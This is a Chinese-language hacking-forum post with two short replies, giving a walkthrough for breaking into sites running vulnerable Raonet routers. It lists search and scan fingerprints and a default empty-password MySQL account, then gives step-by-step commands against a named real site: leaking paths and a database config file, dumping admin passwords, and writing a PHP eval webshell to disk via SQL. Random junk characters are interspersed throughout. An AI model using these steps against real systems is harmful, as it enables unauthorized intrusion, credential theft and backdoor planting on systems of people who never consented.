中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:: L* D7 _- e. o) E; [8 V( I% t$ m/ h
2 k4 ^" \; s1 u. c2 N, A/ Y
1:google搜索'Raonet Subscriber Ethernet Router'
; I1 W1 o- Y$ g, S* c1 h
0 N: ~/ y7 g3 T3 t  H2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( N- D* `+ \! X' k6 S# `5 F& t% m
3 S6 t* I( x* {8 ]
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。1 l+ T4 O% \3 Q7 e

6 e/ A8 [' b' A  h9 Z) W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......; b3 [4 K, @6 G* `% H

) c9 I! n! x$ o) x1 m/ O' G " O# {. h' w( B; O- \

9 G3 A5 V+ G6 ]! D( y3 }入侵步骤:
! j; o; Y6 T$ D/ {6 ~
; T' Y" S- q1 q- y! \  u1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php3 Y) k9 G# C, j# {

' G* m0 ~% |, E. O! _" U( S# ]2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc2 I# p7 Z. D6 a2 A. s6 F, T
3:得到密码后连接,查看GUI管理密码:5 f$ g$ S# v2 b+ E
use ser_500
6 i: n, C$ \8 U6 P- ~, m+ ]select id,passwd from user;3 w- [2 @3 z& `
4:通过数据库写入webshell,执行命令:, ~  J& J4 }# ~8 J" A: X
use mysql;0 Y0 l7 P; m# M8 _  V6 p# _% w. j
create table ok(cmd TEXT);
, b/ n0 r' M8 xinsert into ok values("<?php @eval($_POST[cmd])?>");+ h$ F' a3 \0 `: n% U$ x) U  ~1 A
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 w3 w& v2 k; rdrop table ok;) m3 B; I: d  ]
5 ]2 u  a$ k  c
5:连接后门shell.php 0 S/ `3 d6 _  H; {% F) L
3 u3 e- o( R  x  P' L' ~
6. 搞定!
7 Q& n  r$ g3 h6 ^. C3 i
7 `7 y& D. z2 S" c& w; g
作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2